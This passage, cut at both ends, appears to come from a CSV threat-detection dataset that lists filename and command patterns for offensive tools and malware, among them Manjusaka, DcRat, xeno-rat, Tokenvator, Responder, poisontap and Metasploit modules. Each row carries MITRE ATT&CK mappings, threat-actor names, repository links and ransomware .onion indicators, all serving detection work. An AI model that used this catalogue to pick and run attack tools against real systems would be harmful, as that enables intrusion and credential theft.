T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","N/A","10","10","818","150","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z","54940" "*plug_katz_nps.exe*",".{0,1000}plug_katz_nps\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - 
MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","N/A","10","10","818","150","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z","54941" "*plug_qvte_nps.exe*",".{0,1000}plug_qvte_nps\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - 
LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","N/A","10","10","818","150","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z","54942" "*Plugins.Brutelist*",".{0,1000}Plugins\.Brutelist.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#linux #content","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","54943" "*plugins.nessus.org.*",".{0,1000}plugins\.nessus\.org\..{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability Scanner","https://fr.tenable.com/products/nessus","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","54944" "*plugins/nemesis.rb*",".{0,1000}plugins\/nemesis\.rb.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","54945" "*Plugins\AccessTokens\TokenDriver*",".{0,1000}Plugins\\AccessTokens\\TokenDriver.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","54946" 
"*Plugins\AccessTokens\TokenManipulation*",".{0,1000}Plugins\\AccessTokens\\TokenManipulation.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","54947" "*Plugins\Execution\PSExec*",".{0,1000}Plugins\\Execution\\PSExec.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","54948" "*plugins\ScreenControl.dll*",".{0,1000}plugins\\ScreenControl\.dll.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","54949" "*Plugins\SendFile.dll*",".{0,1000}Plugins\\SendFile\.dll.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","54950" "*Plugins\SendMemory.dll*",".{0,1000}Plugins\\SendMemory\.dll.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","54951" "*plummm/CVE-2022-27666*",".{0,1000}plummm\/CVE\-2022\-27666.{0,1000}","offensive_tool_keyword","POC","Exploit for CVE-2022-27666","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tool","https://github.com/plummm/CVE-2022-27666","1","1","N/A","N/A","N/A","3","204","39","2022-03-28T18:21:00Z","2022-03-23T22:54:28Z","54952" "*pm3 -p /dev/ttyACM0*",".{0,1000}pm3\s\-p\s\/dev\/ttyACM0.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","54953" "*PME\LSA\*-LSA.txt*",".{0,1000}PME\\LSA\\.{0,1000}\-LSA\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular 
tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","54954" "*PME\UserFiles\*-UserFiles.txt*",".{0,1000}PME\\UserFiles\\.{0,1000}\-UserFiles\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","54955" "*pnanlicgxkku2aonwsg2fwid3maycsso7joqnzp66wkfemzdk7ahsdid.onion*",".{0,1000}pnanlicgxkku2aonwsg2fwid3maycsso7joqnzp66wkfemzdk7ahsdid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","54956" "*PoC To enumerate logged on users on a remote system using the winreg named pipe*",".{0,1000}PoC\sTo\senumerate\slogged\son\susers\son\sa\sremote\ssystem\susing\sthe\swinreg\snamed\spipe.{0,1000}","offensive_tool_keyword","GetLoggedOnUsersRegistry","PoC To enumerate logged on users on a remote system using the winreg named pipe","T1087 - T1018 - T1057","TA0007 - 
TA0008","N/A","N/A","Discovery","https://gist.github.com/RalphDesmangles/22f580655f479f189c1de9e7720776f1","1","0","N/A","N/A","8","8","N/A","N/A","N/A","N/A","54957" "*poc.bash*",".{0,1000}poc\.bash.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","#linux","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","54958" "*poc.bat*",".{0,1000}poc\.bat.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","54959" "*poc.bin*",".{0,1000}poc\.bin.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","54960" "*poc.exe*",".{0,1000}poc\.exe.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","54961" "*poc.exe*poc.txt*",".{0,1000}poc\.exe.{0,1000}poc\.txt.{0,1000}","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","N/A","3","266","43","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z","54962" "*poc.msi*",".{0,1000}poc\.msi.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 
- TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","54963" "*poc.pl*",".{0,1000}poc\.pl.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","54964" "*poc.ps1*",".{0,1000}poc\.ps1.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","54965" "*poc.reg*",".{0,1000}poc\.reg.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","54966" "*poc.run*",".{0,1000}poc\.run.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","54967" "*poc.sh*",".{0,1000}poc\.sh.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","54968" "*poc.vb*",".{0,1000}poc\.vb.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 
tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","54969" "*poc.vbe*",".{0,1000}poc\.vbe.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","54970" "*poc.vbs*",".{0,1000}poc\.vbs.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","54971" "*poc.vbscript*",".{0,1000}poc\.vbscript.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","54972" "*poc.zsh*",".{0,1000}poc\.zsh.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","54973" "*POC_CloudFilter_ArbitraryFile_EoP*",".{0,1000}POC_CloudFilter_ArbitraryFile_EoP.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54974" "*POC_CloudFilter_ArbitraryFile_EoP.*",".{0,1000}POC_CloudFilter_ArbitraryFile_EoP\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54975" "*POC1*implant.cpp*",".{0,1000}POC1.{0,1000}implant\.cpp.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","N/A","10","2","170","24","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z","54976" "*POC2*implant.cpp*",".{0,1000}POC2.{0,1000}implant\.cpp.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","N/A","10","2","170","24","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z","54977" "*pocs_go/*/CVE-*.go*",".{0,1000}pocs_go\/.{0,1000}\/CVE\-.{0,1000}\.go.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - 
T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","0","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","54978" "*pod4gkypkd6kykwoht3kioehhpoh4k75ybdfoe6q7hqbphrd77b32jqd.onion*",".{0,1000}pod4gkypkd6kykwoht3kioehhpoh4k75ybdfoe6q7hqbphrd77b32jqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","54979" "*podalirius@protonmail.com*",".{0,1000}podalirius\@protonmail\.com.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","#email","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","54980" "*podman run * --name avred -d avred*",".{0,1000}podman\srun\s.{0,1000}\s\-\-name\savred\s\-d\savred.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","N/A","9","5","465","55","2025-02-26T08:12:03Z","2022-05-19T12:12:34Z","54981" "*poetry run bofhound*",".{0,1000}poetry\srun\sbofhound.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - 
TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","54983" "*poetry run hekatomb*",".{0,1000}poetry\srun\shekatomb.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to an LDAP directory to retrieve information on all computers and users. It then downloads all DPAPI blobs of all users from all computers and uses the Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","N/A","N/A","10","6","510","59","2024-07-31T19:05:30Z","2022-09-09T15:07:15Z","54984" "*poetry run NetExec *",".{0,1000}poetry\srun\sNetExec\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","54985" "*poetry run pysqlrecon*",".{0,1000}poetry\srun\spysqlrecon.{0,1000}","offensive_tool_keyword","PySQLRecon","Offensive MSSQL toolkit written in Python, based off SQLRecon","T1040 - T1078 - T1072 - T1223 - T1059 - T1213","TA0001 - TA0002 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Tw1sm/PySQLRecon","1","0","N/A","N/A","10","3","201","15","2025-01-12T02:14:59Z","2023-09-03T01:14:35Z","54986" "*poetry run ritm *",".{0,1000}poetry\srun\sritm\s.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & 
Spoofing","https://github.com/Tw1sm/RITM","1","0","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","54987" "*pogostick.net/~pnh/ntpasswd/*",".{0,1000}pogostick\.net\/\~pnh\/ntpasswd\/.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","54988" "*PointAndPrint.ps1*",".{0,1000}PointAndPrint\.ps1.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","54989" "*poison_ivy_c2*",".{0,1000}poison_ivy_c2.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54990" "*Poisoners-Session.log*",".{0,1000}Poisoners\-Session\.log.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","#logfile","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","54991" "*poisonivy_bof.*",".{0,1000}poisonivy_bof\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54992" "*poisontap*",".{0,1000}poisontap.{0,1000}","offensive_tool_keyword","poisontap","PoisonTap - siphons cookies. exposes internal router & installs web backdoor on locked computers","T1534.002 - T1059.001 - T1053.005 - T1564.001","TA0002 - TA0007 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/samyk/poisontap","1","0","N/A","N/A","N/A","10","6345","993","2018-11-26T16:50:44Z","2016-11-16T11:51:34Z","54993" "*PoisonTendy.dll*",".{0,1000}PoisonTendy\.dll.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","1","N/A","N/A","10","2","155","29","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z","54994" "*polenum *-protocols *",".{0,1000}polenum\s.{0,1000}\-protocols\s.{0,1000}","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - 